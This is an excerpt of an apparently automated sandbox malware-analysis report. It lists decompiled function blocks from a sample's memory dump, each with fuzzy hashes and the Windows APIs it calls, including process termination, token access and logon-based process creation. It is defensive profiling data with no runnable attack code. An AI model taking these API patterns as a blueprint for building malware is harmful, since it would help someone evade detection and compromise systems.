                            • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                            • Instruction Fuzzy Hash: D951E1B0944216AACF61AF98C4419FEB3F5EF05710F50804BF681AB292DBB45F42FB94
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000C2AF6
                            • VariantClear.OLEAUT32(00000013), ref: 000C2B68
                            • VariantClear.OLEAUT32(00000000), ref: 000C2BC3
                            • _memmove.LIBCMT ref: 000C2BED
                            • VariantClear.OLEAUT32(?), ref: 000C2C3A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000C2C68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: 55cedec745ed44a2ab4d350ed990befa527540cff24f13b609b486a02057dac9
                            • Instruction ID: b5f65d19afbfc8734d9124b2a0e13b07f24cee499091092d45efbcb761b80d4c
                            • Opcode Fuzzy Hash: 55cedec745ed44a2ab4d350ed990befa527540cff24f13b609b486a02057dac9
                            • Instruction Fuzzy Hash: 225133B5A00209AFDB24CF58D880EAEB7B8FF8C314B158559E959DB314E730E951CBA0
                            APIs
                            • GetMenu.USER32(?), ref: 000E833D
                            • GetMenuItemCount.USER32(00000000), ref: 000E8374
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000E839C
                            • GetMenuItemID.USER32(?,?), ref: 000E840B
                            • GetSubMenu.USER32(?,?), ref: 000E8419
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 000E846A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: 2a9bb52909ca0ed7a9a25ea3af0602f1efada9025e42499389dbff105dd1c294
                            • Instruction ID: 34976fb4a1a924e2d2bbed2ace1ca80256f521346a2d7afc0c73d35450c83ce3
                            • Opcode Fuzzy Hash: 2a9bb52909ca0ed7a9a25ea3af0602f1efada9025e42499389dbff105dd1c294
                            • Instruction Fuzzy Hash: 37518C71A00219EFCF11EFA5C941AEEB7F4EF48710F148469E955BB392DB70AE418B90
                            APIs
                            • _memset.LIBCMT ref: 000C552E
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C5579
                            • IsMenu.USER32(00000000), ref: 000C5599
                            • CreatePopupMenu.USER32 ref: 000C55CD
                            • GetMenuItemCount.USER32(000000FF), ref: 000C562B
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000C565C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: 81d015d6e10b0a225105c1d5147facca8f2cb3e00cc44bbcdbc10b08f0610d80
                            • Instruction ID: a8f2db3e01d37df4888a09fbf84c97612b330633806281dec4a108349b4842a0
                            • Opcode Fuzzy Hash: 81d015d6e10b0a225105c1d5147facca8f2cb3e00cc44bbcdbc10b08f0610d80
                            • Instruction Fuzzy Hash: 3451D074600A09DFDF20CF68DC88FAEBBF5AF1935AF50421DE4459B291E3B0A984CB51
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0009B1C1
                            • GetWindowRect.USER32(?,?), ref: 0009B225
                            • ScreenToClient.USER32(?,?), ref: 0009B242
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0009B253
                            • EndPaint.USER32(?,?), ref: 0009B29D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: 5871ebbe11cb9e1a2f725191cf4abb621556139387ef5ca0c9753767eb15ebf2
                            • Instruction ID: 203d664ca1fede7ce148efd1c8e83795f6d23ab87dff549d73267247d403ff40
                            • Opcode Fuzzy Hash: 5871ebbe11cb9e1a2f725191cf4abb621556139387ef5ca0c9753767eb15ebf2
                            • Instruction Fuzzy Hash: 8441D270104201AFCB10DF64ED84FBA7BE8EF46730F040669FA95872B2C7719885EB61
                            APIs
                            • ShowWindow.USER32(00141810,00000000,?,?,00141810,00141810,?,000FE2D6), ref: 000EE21B
                            • EnableWindow.USER32(00000000,00000000), ref: 000EE23F
                            • ShowWindow.USER32(00141810,00000000,?,?,00141810,00141810,?,000FE2D6), ref: 000EE29F
                            • ShowWindow.USER32(00000000,00000004,?,?,00141810,00141810,?,000FE2D6), ref: 000EE2B1
                            • EnableWindow.USER32(00000000,00000001), ref: 000EE2D5
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 000EE2F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 823cd07d31c12781668092103aecd892721a0cef07579edf616039154c4c265c
                            • Instruction ID: 9de1dd544bfca04913dca13fd80a9b061f2ffb91d2dda30803fe5409b9ed7187
                            • Opcode Fuzzy Hash: 823cd07d31c12781668092103aecd892721a0cef07579edf616039154c4c265c
                            • Instruction Fuzzy Hash: 344191302005C8EFDB66CF65C899B947BE5BB0A304F1841B9FB589F6A2C772A841CB51
                            APIs
                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000BBCD9
                            • OpenProcessToken.ADVAPI32(00000000), ref: 000BBCE0
                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000BBCEF
                            • CloseHandle.KERNEL32(00000004), ref: 000BBCFA
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BBD29
                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 000BBD3D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                            • String ID:
                            • API String ID: 1413079979-0
                            • Opcode ID: bdb7ad7e06dc50335841b9255a375a653327ac137e7b389e1ccbafa8a1402fa1
                            • Instruction ID: 02acfff42420f2046b61894a810eb67a5689722138040bd03b7be94cb3c17d58
                            • Opcode Fuzzy Hash: bdb7ad7e06dc50335841b9255a375a653327ac137e7b389e1ccbafa8a1402fa1
                            • Instruction Fuzzy Hash: 19216D7210020DABDF11DFA8ED49BEE7BA9EF04308F044024FA05A6160DBB6DD61DBA0
                            APIs
                              • Part of subcall function 0009B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B5FA
                              • Part of subcall function 0009B58B: BeginPath.GDI32(?), ref: 0009B611
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B63B
                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000EE9F2
                            • LineTo.GDI32(00000000,00000003,?), ref: 000EEA06
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEA14
                            • LineTo.GDI32(00000000,00000000,?), ref: 000EEA24
                            • EndPath.GDI32(00000000), ref: 000EEA34
                            • StrokePath.GDI32(00000000), ref: 000EEA44
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                            • String ID:
                            • API String ID: 43455801-0
                            • Opcode ID: dc602bb393ea32a78d034db23c683c68c63fae4fd42b764fe395f9864aa9bb2a
                            • Instruction ID: bc4a69c737e1689aa6dadf5dbda7f1e595c12852529e42c9d7f41e789cee6ad0
                            • Opcode Fuzzy Hash: dc602bb393ea32a78d034db23c683c68c63fae4fd42b764fe395f9864aa9bb2a
                            • Instruction Fuzzy Hash: 0E111B7600014DBFDF029F90EC88EDA7FADEB08350F048021FE595A560D7B19D95DBA0
                            APIs
                            • GetDC.USER32(00000000), ref: 000BEFB6
                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000BEFC7
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000BEFCE
                            • ReleaseDC.USER32(00000000,00000000), ref: 000BEFD6
                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000BEFED
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 000BEFFF
                              • Part of subcall function 000BA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000BA79D,00000000,00000000,?,000BAB73), ref: 000BB2CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDevice$ExceptionRaiseRelease
                            • String ID:
                            • API String ID: 603618608-0
                            • Opcode ID: dea116f88cf899e21ccb08a0a2a6ad8d2c44220c4b709a189d61ad5f11a885f6
                            • Instruction ID: 3629922eac67a2bf4b3d8d1e758c6706e640158d836027b1d67f5578f420fcf7
                            • Opcode Fuzzy Hash: dea116f88cf899e21ccb08a0a2a6ad8d2c44220c4b709a189d61ad5f11a885f6
                            • Instruction Fuzzy Hash: 32018475A00205BFEB109BE5DC45B9EBFB8EB48751F004066FA08AB290D6719C00CB61
                            APIs
                            • __init_pointers.LIBCMT ref: 000A87D7
                              • Part of subcall function 000A1E5A: __initp_misc_winsig.LIBCMT ref: 000A1E7E
                              • Part of subcall function 000A1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A8BE1
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A8BF5
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A8C08
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A8C1B
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A8C2E
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000A8C41
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000A8C54
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000A8C67
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000A8C7A
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000A8C8D
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000A8CA0
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000A8CB3
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000A8CC6
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000A8CD9
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000A8CEC
                              • Part of subcall function 000A1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000A8CFF
                            • __mtinitlocks.LIBCMT ref: 000A87DC
                              • Part of subcall function 000A8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0013AC68,00000FA0,?,?,000A87E1,000A6AFA,001367D8,00000014), ref: 000A8AD1
                            • __mtterm.LIBCMT ref: 000A87E5
                              • Part of subcall function 000A884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000A87EA,000A6AFA,001367D8,00000014), ref: 000A89CF
                              • Part of subcall function 000A884D: _free.LIBCMT ref: 000A89D6
                              • Part of subcall function 000A884D: DeleteCriticalSection.KERNEL32(0013AC68,?,?,000A87EA,000A6AFA,001367D8,00000014), ref: 000A89F8
                            • __calloc_crt.LIBCMT ref: 000A880A
                            • GetCurrentThreadId.KERNEL32 ref: 000A8833
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 2942034483-0
                            • Opcode ID: 816893e452489bfa14735bf1974d9cc80c07542a66bb546587ed661aeb454337
                            • Instruction ID: e94f133ad2bab427ea2528d447fa765b2acb5ba5e9ecf3398d5305259417fa4c
                            • Opcode Fuzzy Hash: 816893e452489bfa14735bf1974d9cc80c07542a66bb546587ed661aeb454337
                            • Instruction Fuzzy Hash: 0BF0903251D7125AE26477F87C076CA2AD09F03770B60CA6AF4A5D50D3FF1088814361
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 1423608774-0
                            • Opcode ID: bab6953b16e9f0592360629017ec1cc8d521ce7a4bcef6551ce475f46842b5f0
                            • Instruction ID: 02324b8475df1fd7669c8d9391978e3fe3d5fcb9595e4f99b62f3629e52d1984
                            • Opcode Fuzzy Hash: bab6953b16e9f0592360629017ec1cc8d521ce7a4bcef6551ce475f46842b5f0
                            • Instruction Fuzzy Hash: A001A432201211ABDB152B94FD98EEF77B9FF8A702B40052DF543D29A5CFB0A940CB51
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00081898
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 000818A0
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000818AB
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000818B6
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 000818BE
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000818C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            • Opcode ID: 8ce779c485eee103ef92e9c76d60174f1328a8c3d2ac80e66fb119a040d732db
                            • Instruction ID: 497838952fb2660643f7447ed669f830c47975fde2ec2671ec4200f6dc5d182e
                            • Opcode Fuzzy Hash: 8ce779c485eee103ef92e9c76d60174f1328a8c3d2ac80e66fb119a040d732db
                            • Instruction Fuzzy Hash: BB0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C8504
                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000C851A
                            • GetWindowThreadProcessId.USER32(?,?), ref: 000C8529
                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8538
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8542
                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C8549
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                            • String ID:
                            • API String ID: 839392675-0
                            • Opcode ID: aa7077dcf5ddd58315ab0442c9e6ac0f3151cd513f2541dcd8b5781215cb711c
                            • Instruction ID: ede5e96ba7a2cd9a381f383e329ac4f17f16bb5300f33e91494f44917bf90884
                            • Opcode Fuzzy Hash: aa7077dcf5ddd58315ab0442c9e6ac0f3151cd513f2541dcd8b5781215cb711c
                            • Instruction Fuzzy Hash: C3F03A72240158BBE7215BA2AD0EEEF7A7CEFC6B15F000058FA4591051EFF16A81C6B5
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 000CA330
                            • EnterCriticalSection.KERNEL32(?,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA341
                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA34E
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA35B
                              • Part of subcall function 000C9CCE: CloseHandle.KERNEL32(?,?,000CA368,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000C9CD8
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 000CA36E
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,000F66D3,?,?,?,?,?,0008E681), ref: 000CA375
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            • Opcode ID: b41c7d61c711cc809d09ad623e68bec9129431ad844f14665aa035329a6514a8
                            • Instruction ID: d379e14392d1a715f50ce96c0a12f08d7f4e82c015257835a2b066a4eaa18f4e
                            • Opcode Fuzzy Hash: b41c7d61c711cc809d09ad623e68bec9129431ad844f14665aa035329a6514a8
                            • Instruction Fuzzy Hash: 3FF08C72141211ABD3112BA4FD8CEDF7BBAFF8A302B400525F243A58A5CFF59981CB61
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 0008BBD9: _memmove.LIBCMT ref: 0008BC33
                            • __swprintf.LIBCMT ref: 0009D98F
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0009D832
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: 3dd365910125c1047718e1d52295a49b7f485a7da5396d703876f73c8ac7e481
                            • Instruction ID: 407e1a5535d76621d8138cd5fc8c80d2961a10667b18bf6201c177ab202e0951
                            • Opcode Fuzzy Hash: 3dd365910125c1047718e1d52295a49b7f485a7da5396d703876f73c8ac7e481
                            • Instruction Fuzzy Hash: 8E915B311182059FCB54FF28C895DAEB7E5FF95710F00492EF596972A2DB20EE04EB92
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000DB4A8
                            • CharUpperBuffW.USER32(?,?), ref: 000DB5B7
                            • VariantClear.OLEAUT32(?), ref: 000DB73A
                              • Part of subcall function 000CA6F6: VariantInit.OLEAUT32(00000000), ref: 000CA736
                              • Part of subcall function 000CA6F6: VariantCopy.OLEAUT32(?,?), ref: 000CA73F
                              • Part of subcall function 000CA6F6: VariantClear.OLEAUT32(?), ref: 000CA74B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
